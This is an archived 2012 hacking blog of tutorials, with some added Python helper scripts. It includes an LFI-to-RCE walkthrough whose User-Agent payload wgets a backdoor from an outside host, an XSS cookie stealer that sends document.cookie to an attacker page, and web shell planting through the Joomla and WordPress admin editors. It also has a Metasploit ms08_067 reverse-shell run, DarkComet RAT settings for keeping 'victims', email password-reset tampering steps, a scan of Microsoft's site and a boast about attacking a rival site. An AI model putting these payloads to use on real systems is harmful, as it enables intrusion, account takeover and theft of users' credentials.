Saturday, 15 December 2012

WMAP WEB SCANNER METASPLOIT

ur0b0r0x@consolex_ /opt/metasploit-4.4.0/msf3 $ msfconsole

     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 951 exploits - 506 auxiliary - 152 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops

msf > db_connect -y /opt/metasploit-4.4.0/config/database.yml
msf > load wmap

.-.-.-..-.-.-..---..---.
| | | || | | || | || |-'
`-----'`-'-'-'`-^-'`-'
[WMAP 1.5.1] ===  et [  ] metasploit.com 2012
[*] Successfully loaded plugin: wmap

msf > wmap_sites -a www.microsoft.com,http://65.55.58.201/
[*] Site created.
msf > wmap_sites -l
[*] Available sites
===============

 Id  Host             Vhost                Port  Proto  # Pages  # Forms
 --  ----             -----                ----  -----  -------  -------
 0   65.55.58.201     www.microsoft.com    80    http   0        0


msf > wmap_sites -s 0 1
    [www.microsoft.com] (65.55.58.201)
msf > wmap_targets -t microsoft.com,http://65.55.58.201/
msf > set DOMAIN www.microsoft.com
DOMAIN => www.microsoft.com
msf > wmap_targets  -d 0
[*] Loading www.microsoft.com,http://65.55.58.201:80/.
msf > wmap_targets  -l
[*] Defined targets
===============

     Id  Vhost              Host          Port  SSL    Path
     --  -----              ----          ----  ---    ----
     0   www.microsoft.com  65.55.58.201  80    false    /


msf > wmap_run -t
[*] Testing target:
[*]     Site: www.microsoft.com (65.55.58.201)
[*]     Port: 80 SSL: false
============================================================
[*] Testing started. 2012-09-17 17:48:50 -0500
[*] Loading wmap modules...

[*] 38 wmap enabled modules loaded.
[*]
=[ SSL testing ]=
============================================================
[*] Target is not SSL. SSL modules disabled.
[*]
=[ Web Server testing ]=
============================================================
[*] Module auxiliary/scanner/http/http_version
[*] Module auxiliary/scanner/http/open_proxy
=[ File/Dir testing ]=
============================================================
[*] Module auxiliary/scanner/http/backup_file
[*] Module auxiliary/scanner/http/brute_dirs
[*] ETC ETC ETC ETC ETC.....
=[ Unique Query testing ]=
============================================================
[*] Module auxiliary/scanner/http/blind_sql_query
[*] Module auxiliary/scanner/http/error_sql_injection
[*] ETC ETC ETC ETC ETC.....

 
msf > wmap_run -e
[*] Using ALL wmap enabled modules.
[*] Testing target:
[*]     Site: www.microsoft.com (65.55.58.201)
[*]     Port: 80 SSL: false
============================================================
[*] Testing started. 2012-09-17 18:03:07 -0500
[*]
=[ SSL testing ]=
============================================================
[*] Target is not SSL. SSL modules disabled.
[*]
=[ Web Server testing ]=
============================================================
[*] Module auxiliary/scanner/http/http_version

[*] 65.55.58.201:80 Microsoft-IIS/7.5 ( Powered by ASP.NET, 301-http://www.microsoft.com )
[*] ETC ETC ETC......

msf > hosts -c address,svcs,vulns

Hosts
=====
address        svcs  vulns
-------        ----  -----
65.55.58.201    1     1
msf > vulns
[*] Time: 2012-09-17 18:05:49 UTC Vuln: host=65.55.58.201 port=80 proto=tcp name=auxiliary/scanner/http/options refs=CVE-2005-3398,CVE-2005-3498,OSVDB-877,BID-11604,BID-9506,BID-9561
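Below is an added example, not part of the original post, that parses the `vulns` record format shown above into structured data (host, port, module, refs grouped by CVE/OSVDB/BID), which is handy when a WMAP run has to be reported or diffed against a previous one. The first sample line is the record printed above; the second is constructed for the example and is not scan output, and its module name is an assumption.

```python
import re
from collections import defaultdict

# Constructed sample: the record printed above, plus a second line made up for
# the example (its module name and empty refs are assumptions, not scan output).
SAMPLE = """\
[*] Time: 2012-09-17 18:05:49 UTC Vuln: host=65.55.58.201 port=80 proto=tcp name=auxiliary/scanner/http/options refs=CVE-2005-3398,CVE-2005-3498,OSVDB-877,BID-11604,BID-9506,BID-9561
[*] Time: 2012-09-17 18:06:12 UTC Vuln: host=65.55.58.201 port=80 proto=tcp name=auxiliary/scanner/http/http_version refs=
"""

# One record per line: Time, then key=value fields; refs is a comma list (may be empty)
VULN_RE = re.compile(
    r"^\[\*\]\s+Time:\s+(?P<time>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} \S+)\s+"
    r"Vuln:\s+host=(?P<host>\S+)\s+port=(?P<port>\d+)\s+proto=(?P<proto>\S+)\s+"
    r"name=(?P<name>\S+)\s+refs=(?P<refs>\S*)\s*$"
)

def parse_vuln_line(line):
    """Return a dict for one `vulns` record, or None for lines that are not records."""
    m = VULN_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["port"] = int(rec["port"])
    rec["refs"] = [r for r in rec["refs"].split(",") if r]
    return rec

def group_refs(refs):
    """Bucket reference identifiers by source: CVE, OSVDB, BID or other."""
    groups = defaultdict(list)
    for ref in refs:
        prefix = ref.partition("-")[0]
        groups[prefix if prefix in ("CVE", "OSVDB", "BID") else "other"].append(ref)
    return dict(groups)

def parse_vulns(text):
    """All records in a pasted `vulns` listing; prompts and banners are skipped."""
    return [rec for rec in (parse_vuln_line(l) for l in text.splitlines()) if rec]

def summarize(records):
    """Per host:port, the modules that fired and the CVEs they cite (sorted)."""
    summary = defaultdict(lambda: {"modules": [], "cves": set()})
    for rec in records:
        key = f"{rec['host']}:{rec['port']}"
        summary[key]["modules"].append(rec["name"].rsplit("/", 1)[-1])
        summary[key]["cves"].update(group_refs(rec["refs"]).get("CVE", []))
    return {k: {"modules": v["modules"], "cves": sorted(v["cves"])}
            for k, v in summary.items()}

if __name__ == "__main__":
    for key, info in summarize(parse_vulns(SAMPLE)).items():
        print(key, info)
```

Paste the output of `vulns` into `SAMPLE` (or read it from a file) and `summarize` gives one entry per service; the CVE list is what you would carry into a report, while the OSVDB and BID identifiers are kept for cross-referencing older advisories.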

Tuesday, 11 December 2012

Local File Inclusion Vulnerability Demonstration - Web Hacking

Local file inclusion is a very popular web application attack. It was very common a few years ago; nowadays you will rarely find websites vulnerable to it, but a single vulnerability can still get a website compromised.

Here are some common parameters (also used as search dorks) that are often vulnerable to local or remote file inclusion attacks:

index.php?index2=
index.php?homepage=
index.php?page=
 
Requirements:

1) A vulnerable website
2) A remote shell ( http://www.sh3ll.org/egy.txt )
3) The User Agent Switcher extension ( https://addons.mozilla.org/en-US/firefox...-switcher/ )
4) Mozilla Firefox

The first thing a hacker does when looking for an LFI vulnerability is to try to read the /etc/passwd file through the suspect parameter. If its contents appear in the page, a local file inclusion vulnerability is present. The image below tells the whole story: "root" is the username, followed by "x" where the password used to be. The password is shadowed, meaning its hash is kept in the /etc/shadow file, which is only readable with root privileges.



Next the hacker checks for /proc/self/environ, so change the included path to /proc/self/environ (it is a file, not a directory, so no trailing slash). If the web server process can read it, the page should look something like the screenshot below; on many hosts it is not readable or /proc is not exposed, so not all sites have it.


Once the local file inclusion vulnerability has been identified, the hacker tries to turn it into remote code execution and from there gain further access. This can be done by uploading a PHP backdoor. The trick is that /proc/self/environ holds the environment of the process serving the request, including HTTP_USER_AGENT, a copy of the request's User-Agent header. Including that file therefore makes PHP execute any code placed in the User-Agent. A commonly used tool for setting the header in the browser is the User Agent Switcher extension linked above.


The hacker edits the user agent and sets the user-agent string to the following code:

<?php phpinfo();?>

Select your User-Agent in Tools > Default User Agent > PHP Info (or whatever your user agent is called).



After refreshing the website he searches the resulting phpinfo() output for the keyword "disable_functions" (Ctrl+F):

disable_functions | no value | no value


A value of "no value" means no PHP functions have been disabled, so exec() and the other command-execution functions are callable: the website is vulnerable to remote code execution and we can now upload the PHP backdoor. Having found this, he sets the User-Agent to the following code and reloads the page:


<?php exec('wget http://www.sh3ll.org/egy.txt -O shell.php'); ?>

exec() runs wget on the server, which downloads the backdoor (hosted as a .txt file so the hosting server does not execute it) and saves it as shell.php in the web server's current working directory; that is what "renames" it to .php. It only works if wget exists on the server, that directory is writable by the web server user and it is reachable over HTTP. Now the shell has been successfully uploaded. Once the PHP backdoor has been uploaded it will look like the following:
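The following is an added example, not from the original post, that wraps the manual checks above in code: building the traversal URL, recognising /etc/passwd lines in a response, decoding the NUL-separated /proc/self/environ dump, and reading disable_functions out of phpinfo() HTML. It deliberately contains no HTTP client and runs against sample bodies constructed in the script; the target URL and parameter name are assumptions.

```python
import re
from html import unescape
from urllib.parse import quote

TARGET = "http://target.example/index.php"   # hypothetical vulnerable site (assumption)
PARAM = "page"                                # one of the parameters listed above

def lfi_url(path, depth=6, base=TARGET, param=PARAM):
    """Build the ?page=../../../etc/passwd style URL. Extra ../ hops are harmless
    because the kernel stops resolving at /."""
    return f"{base}?{param}={quote('../' * depth + path.lstrip('/'), safe='/')}"

# user:passwd:uid:gid:gecos:home:shell, one entry per line, as the included file
# is emitted verbatim into the response
PASSWD_RE = re.compile(r"^([^:\s]+):([^:]*):(\d+):(\d+):[^:]*:[^:]*:(\S*)$", re.M)

def passwd_entries(body):
    """/etc/passwd lines found in a response body -> [(user, uid, shell), ...].
    An 'x' in the password field means the hash lives in /etc/shadow (root only)."""
    return [(m.group(1), int(m.group(3)), m.group(5)) for m in PASSWD_RE.finditer(body)]

def lfi_confirmed(body):
    """The post's criterion: the root (uid 0) entry shows up in the page."""
    return any(user == "root" and uid == 0 for user, uid, _ in passwd_entries(body))

def environ_vars(raw):
    """/proc/self/environ is NUL-separated KEY=VALUE pairs; when the web server
    includes it, the pairs arrive unchanged inside the HTML."""
    out = {}
    for pair in raw.split(b"\x00"):
        if b"=" in pair:
            key, _, value = pair.partition(b"=")
            out[key.decode(errors="replace")] = value.decode(errors="replace")
    return out

def user_agent_reflected(raw):
    """True when HTTP_USER_AGENT is present, i.e. the request header is copied into
    the very file the vulnerable include() will execute."""
    return "HTTP_USER_AGENT" in environ_vars(raw)

# phpinfo() renders each directive as <td>name</td><td>local value</td><td>master value</td>
DISABLED_RE = re.compile(r"disable_functions</td>\s*<td[^>]*>(?P<local>.*?)</td>", re.S | re.I)

def disabled_functions(phpinfo_html):
    """Local value of disable_functions; [] means nothing is disabled, None means
    no phpinfo table was found in the response."""
    m = DISABLED_RE.search(phpinfo_html)
    if not m:
        return None
    value = unescape(re.sub(r"<[^>]+>", "", m.group("local"))).strip()
    return [] if value in ("", "no value") else [fn.strip() for fn in value.split(",")]

def rce_possible(phpinfo_html, needed=("exec",)):
    """Code execution via the User-Agent needs at least one of `needed` callable."""
    disabled = disabled_functions(phpinfo_html)
    return disabled is not None and not any(fn in disabled for fn in needed)

# --- constructed samples (not captured from any real host) ---------------------
PASSWD_BODY = ("<html><body>\nroot:x:0:0:root:/root:/bin/bash\n"
               "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n</body></html>")
ENVIRON_BODY = b"DOCUMENT_ROOT=/var/www\x00HTTP_USER_AGENT=<?php phpinfo();?>\x00REMOTE_ADDR=10.0.0.5\x00"
PHPINFO_OPEN = ('<tr><td class="e">disable_functions</td><td class="v"><i>no value</i></td>'
                '<td class="v"><i>no value</i></td></tr>')
PHPINFO_LOCKED = ('<tr><td class="e">disable_functions</td><td class="v">exec,system,passthru</td>'
                  '<td class="v">exec,system,passthru</td></tr>')

if __name__ == "__main__":
    print(lfi_url("/etc/passwd"))
    print("LFI confirmed:", lfi_confirmed(PASSWD_BODY))
    print("User-Agent lands in environ:", user_agent_reflected(ENVIRON_BODY))
    print("RCE possible (open/locked):", rce_possible(PHPINFO_OPEN), rce_possible(PHPINFO_LOCKED))
```

The `disabled_functions` parser is the one that decides whether the wget step can work: on a host where exec, system and passthru are listed, the User-Agent trick still executes PHP but the command-execution call fails, which is the "locked" sample above.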

Feel free to ask about any issue.

Monday, 29 October 2012

Carrying out the strongest attacks on the biggest vile hacker site, v4-team.com

Today, 29-10, the strongest attacks were carried out on the server of Aman al-Jarb, the site known for booby-trapping its pages and for bad administration, after confirmed information that the administration had booby-trapped the site with Java exploits to compromise visitors and members. More attacks await the filthy site.



Tuesday, 16 October 2012

Uploading Shell in Joomla

Hey all, today I will be telling you about uploading a shell in Joomla.

So without wasting time, let's start.

1. Suppose we have access to the Joomla administrator back end.

2. After logging in we are inside the site's administration, from where we can edit templates and do many things with the database, as shown in the image below.

3. Go to Extensions and, inside that, Template Manager, as shown in the image below.

4. In the Template Manager we see all the templates installed on the site.

5. The one marked in red has the star: it is the template the site currently uses by default. Select any template; I am taking beez. (Replacing index.php of the default template replaces every front-end page, which is why a non-default template is the usual pick.)

6. Once we click on beez we see something like the image below. Then click on Edit HTML.

7. Once you click Edit HTML you see something like the image below. The part in red, /templates/beez/index.php, is the path where your shell will live.

8. Now paste your shell code in there and save it.

9. As soon as we click Save it takes us to a page that shows "Template source saved".

Once that is done we can access our shell. The path of the shell would be

www.site.com/templates/beez/index.php

I hope you all enjoyed this tutorial; if you have any confusion or problem you may ask in the comments.


Uploading Shell in Wordpress

Hey all, in this tutorial I will tell you how to upload a shell in WordPress.

First of all we must have access to the WordPress admin. Many of you must have tried symlink attacks and got WordPress and Joomla databases, but what about uploading a shell through them?

So here we go, just follow me.

1. Log in to your WordPress site; after logging in you will see something like the image below.

2. On the left-hand side you can see the Editor option under Appearance; follow that option.

3. In the editor you will see the different themes. Select any theme you want, and then select a template file, as shown in the image below.

4. After selecting the theme and template, replace the file's code with our shell code and click Update File.

5. After the update it should show "File edited successfully". Then go to your shell path, i.e. www.targetsite.com/wp-content/themes/yourtheme/templatename.php.

Our shell is uploaded ;)

I hope you all enjoyed this tutorial; if you have any confusion or problem you may ask in the comments.

Tuesday, 14 August 2012

XSS vulnerabilities and how to make use of them

Sites affected by XSS are those whose rendered page can be altered by injecting JavaScript or HTML into it. (The injected code runs in visitors' browsers; XSS does not let you run PHP on the server, although PHP is useful on the collecting side, as shown below.)
What you need to know: HTML, JavaScript, PHP

So an XSS vulnerability means being able to modify the site's content as users see it.
Most of these bugs live in site search boxes,
for example a search page's address, or in comment boxes, messages and other text inputs.
Say the site writes "Search results for word :" on its search page.
But what if we enter a JavaScript snippet in the search box?
The search page will write "Search results for <script>alert("XSS")</script>word :"
The script is now inserted into the page and an alert box showing XSS pops up.
That means the site is vulnerable to XSS.
Why is the site vulnerable?

Because the site's developers did not encode or filter the search term before writing it into the page, so characters such as <, >, ", ' and & go through unchanged and the browser treats them as HTML and JavaScript instead of text.
There are two types of XSS vulnerability:

The persistent (stored) type:

Usually found in comment boxes and replies.
In a site's comment box we enter, for example, JavaScript code:
<script>alert("XSS")</script>
The comment is saved on the page, so the JavaScript is stored permanently in the page and runs for everyone who views it.

The temporary (reflected) type:
Usually found in search pages, where we cannot store the code permanently but can only inject it through the search link, as in the previous example:
http://www.infectedsite.com/search.php?q=<script>alert("XSS")</script>word

What is the use of XSS vulnerabilities, and how do we compromise a site through them?

There are many ways to attack a site through XSS;
the most important is stealing cookies.
You need hosting that supports PHP.
Create a PHP page, for example stealer.php,
that writes whatever it receives via GET to a file.
The code:
<?php
// Append whatever arrives in the "c" parameter, one entry per line
$data = isset($_GET["c"]) ? $_GET["c"] : "";
$f = fopen("cookies.txt", "a");   // "a" appends; "w" would overwrite the previous victim
fwrite($f, $data . "\n");
fclose($f);
?>
This page writes the data it receives to cookies.txt. The data we feed it is the cookie, sent by injecting JavaScript through the vulnerability. For a reflected bug in the search page the injected script is:
<script>document.location="http://yoursite.com/stealer.php?c="+encodeURIComponent(document.cookie)</script>
This code redirects the victim to your site and hands the logging page the cookie value, read with
document.cookie
Now if we open the file
we find the user's cookies written in it.
For stored vulnerabilities it is enough to post the same code
<script>document.location="http://yoursite.com/stealer.php?c="+encodeURIComponent(document.cookie)</script>
to steal the cookies of everyone who views the page.
Stored XSS can also be used to redirect the browser of anyone visiting the vulnerable page,
again by assigning
document.location
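An added example, not from the original post, showing the search page described above in its vulnerable form (the term concatenated raw) and its fixed form (HTML-encoded), plus the check the cookie stealer silently depends on: whether script can read the cookie at all, which an HttpOnly flag prevents. The URLs and names are taken from the post or assumed (the cookie name is an assumption); no network access is involved.

```python
import html
from urllib.parse import urlsplit, parse_qs, quote

PAYLOAD = '<script>alert("XSS")</script>'   # the probe used in the post

def query_from_url(url, param="q"):
    """Pull the search term out of .../search.php?q=<term> (first value only)."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get(param, [""])[0]

def render_vulnerable(term):
    # the lazy search page from the post: the term is concatenated into the HTML as-is
    return f"<p>Search results for {term} :</p>"

def render_fixed(term):
    # encode <, >, &, " and ' so the browser shows them as text, never as markup
    return f"<p>Search results for {html.escape(term, quote=True)} :</p>"

def payload_executes(page_html, payload=PAYLOAD):
    """True when the payload landed in the page byte for byte, which is what makes
    the alert box appear; encoded output does not count."""
    return payload in page_html

def stealer_url(cookie, collector="http://yoursite.com/stealer.php"):
    """The URL the injected document.location assignment sends the browser to."""
    return f"{collector}?c={quote(cookie, safe='')}"

def script_can_read_cookie(set_cookie_header):
    """The stealer only ever receives document.cookie. A cookie set with HttpOnly
    is withheld from script, so the injected code gets nothing for it."""
    attrs = [a.strip().lower() for a in set_cookie_header.split(";")[1:]]
    return "httponly" not in attrs

if __name__ == "__main__":
    # constructed: the reflected-XSS link from the post
    url = "http://www.infectedsite.com/search.php?q=" + PAYLOAD + "word"
    term = query_from_url(url)
    for render in (render_vulnerable, render_fixed):
        page = render(term)
        print(render.__name__, "->", page, "| executes:", payload_executes(page))
    print(stealer_url("PHPSESSID=abc123"))
    for hdr in ("PHPSESSID=abc123; Path=/", "PHPSESSID=abc123; Path=/; HttpOnly; Secure"):
        print(hdr, "-> readable by script:", script_can_read_cookie(hdr))
```

The fix is output encoding at the point where the term is written into HTML, not input filtering of "special characters": `html.escape` turns the probe into `&lt;script&gt;...` that the browser renders as text. Even on a site that stays vulnerable, a session cookie issued with HttpOnly never reaches cookies.txt, which is why the stealer sometimes logs an empty line.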

Wednesday, 6 June 2012

Fixing the problem of losing victims in DarkComet RAT

Several friends complained to me about a problem in DarkComet: losing victims (infected hosts dropping off the client list).
The fix is simple, just use the correct settings; the cause is not the crypter, as is commonly claimed.

The cause of the problem is not setting a password, as shown in the picture below.
Make it look like mine; enter the password you want, then save.


You must also set a password in the second place, and it has to be the same as the password set in the first picture.
For example, in the first picture I set the password 12345.
Look at the settings in the second picture: the password there must match the one you entered in the first picture's settings.

Enter the password you put before and click "generate" a few times.
After applying the correct settings as shown in this lesson you will no longer have the problem of losing victims.
cobra-team

Saturday, 26 May 2012

Joomla Security Scanner V1.0

A vulnerability scanner made specifically for Joomla!
It finds vulnerabilities of the following kinds:

1. XSS
2. SQL injection
3. CSRF
4. RFI
5. LFI
6. Brute force

VirusTotal detection ratio: 1 / 42


https://www.virustotal.com/file/e29ea664...338010750/


You can download the program via direct link here -
http://lnk.co/I1CAD

Thursday, 24 May 2012

How to Update to Metasploit 4 and use Autopwn in Backtrack 5


Metasploit 4
Well, given the recent release of Backtrack 5 and of Metasploit 4, and knowing how popular the super-quick-and-dirty Autopwn function is, I thought I'd write a brief instructional on how to get Metasploit 4 up and running on Backtrack 5 and how to use Autopwn with it, for those who can't figure it out for themselves.

First things first, we need to update Metasploit. Open a terminal, then type the following to change into the appropriate directory and update:
  1. cd /pentest/exploits/framework3/
  2. ./msfupdate

Next, to have the database working properly we need the environment set correctly, and for that we need to run msfconsole with the following command:
  1. /usr/local/bin/msfconsole


Now check that the database driver is loaded. Type:
  1. db_status
You should receive a response saying "postgresql connected to msf3". Now nmap the host:
  1. db_nmap -sS -sV -T 5 -P0 -O 172.16.40.43
I only have SSH open on mine, as I was scanning my work laptop, so this will not be vulnerable to any exploits in Metasploit either, unfortunately. I did not have quick access to any vulnerable machines to use for this demo. As you may have noticed, I also used a loud and thorough scan on this one; feel free to modify it to suit your needs with any nmap-friendly flags.


Finally, once the scan is complete, exploit with:
  1. db_autopwn -p -e -t
Or whatever your favourite flags are. Then you watch it all go by and hopefully at the end you have a session. Don't forget, to use it:
  1. sessions -l
  2. sessions -i 1
Happy testing!

Monday, 30 April 2012

ms08_067_netapi Metasploit Attack

I made this tutorial for users new to security and Backtrack on the Top-Hat-Sec forums and my blog, to get them familiar with the Metasploit console and maybe get them through penetrating their first system. This has to be run on an unpatched XP machine or VM, with only SP1 I believe, if I'm not mistaken.
First open netdiscover to find the target machine on your network. You can do this by running the command alone in a terminal, or get more detail by running it like this:
netdiscover -i eth0 -r 192.168.0.1/24
with output something like mine.
Now open a Metasploit console by typing in the terminal:
msfconsole
Now we want to search for all exploits that have to do with netapi, so we run that search with the command below:
search netapi
You'll want to use the exploit I highlighted in this screenshot:
use exploit/windows/smb/ms08_067_netapi
Now type show options to list all the options that can be set for this exploit:
show options
Now let's set our remote host, the machine we are attacking (the victim's PC):
set RHOST 192.168.0.101
Now we set the payload for the exploit by typing the command below:
set PAYLOAD windows/meterpreter/reverse_tcp
Now we need to set the local host, which is our own machine (the attacker's, i.e. you):
set LHOST 192.168.0.100
Last but not least, type the command below to begin exploiting the system:
exploit
If all works well you should see "Meterpreter session 1 opened" and a meterpreter prompt below it. That's it, you are now inside the victim's machine and can run any Meterpreter commands to continue exploiting it. Hopefully you find my tutorials useful; I'll make some more on SET and others in the near future. Thanks for checking it out.

Sunday, 29 April 2012

WebSploit Toolkit 1.6

WebSploit is an open source project for scanning and analysing remote systems for vulnerabilities.

Description:

[+] Autopwn - uses Metasploit to scan and exploit target services
[+] wmap - scans and crawls the target using the Metasploit wmap plugin
[+] format infector - injects reverse and bind payloads into file formats
[+] phpmyadmin - searches for the target's phpMyAdmin login page
[+] lfi - scans for local file inclusion vulnerabilities and can bypass some WAFs
[+] apache users - searches for user directories on the server (if it runs the Apache web server)
[+] Dir Bruter - brute-forces target directories with a wordlist
[+] admin finder - searches for the target's admin and login pages
[+] MLITM Attack - Man Left In The Middle, XSS phishing attacks
[+] MITM - Man In The Middle attack
[+] Java Applet Attack - Java signed applet attack
[+] MFOD Attack Vector - Middle Finger Of Doom attack vector
[+] USB Infection Attack - creates an executable backdoor to infect USB drives on Windows

Download Here :
Websploit toolkit

Saturday, 28 April 2012

Hotmail, AOL and Yahoo Password Reset

1.) Hotmail:

Step 1. Go to this page: https://maccount.live.com/ac/resetpwdmain.aspx
Step 2. Enter the target email and enter the 6 characters you see.
Step 3. Start Tamper Data.
Step 4. Delete the element "SendEmail_ContinueCmd".
Step 5. Change the element "__V_previousForm" to "ResetOptionForm".
Step 6. Change the element "__viewstate" to "%2FwEXAQUDX19QDwUPTmV3UGFzc3dvcmRGb3JtZMw%2BEPFW%2Fak6gMIVsxSlDMZxkMkI".
Step 7. Click OK and type the new password.
Step 8. Start Tamper Data again and add the element "__V_SecretAnswerProof". The proof is not constant like in the old exploit ("++++"); you need a new proof every time.


2.) Yahoo:

Step 1. Go to this page: https://edit.yahoo.com/forgot
Step 2. Enter the target email and enter the 6 characters you see.
Step 3. Start Tamper Data.
Step 4. Change the element "Stage" to "fe200".
Step 5. Click OK and type the new password.
Step 6. Start Tamper Data: all in element "Z".
Step 7. Done.


3.) AOL:

Step 1. Go to the reset page.
Step 2. Enter the target email and enter the characters you see.
Step 3. Start Tamper Data.
Step 4. Change the element "action" to "pwdReset".
Step 5. Change the element "isSiteStateEncoded" to "false".
Step 6. Click OK and type the new password.
Step 7. Start Tamper Data: all in element "rndNO".
Step 8. Done.

Friday, 6 January 2012

★★ How To Portforward Using Utorrent ★★

~~ First of all, do the following ~~

• Click Download in the top right corner and you will be redirected to an automatic download
• Install it as you like
• Run it as Administrator if you wish once you have finished downloading and installing
• After you run it, the official BitTorrent client will start up
• Then go to Options in the top left corner --> Preferences --> Connection
• You can copy my settings if you want or choose your own!

• Then click Apply and voilà!


Notes!

• Your port is open only while uTorrent is running

• Add a uTorrent exception in your firewall

• If your firewall is blocking incoming connections your port won't listen!

• Have fun and enjoy!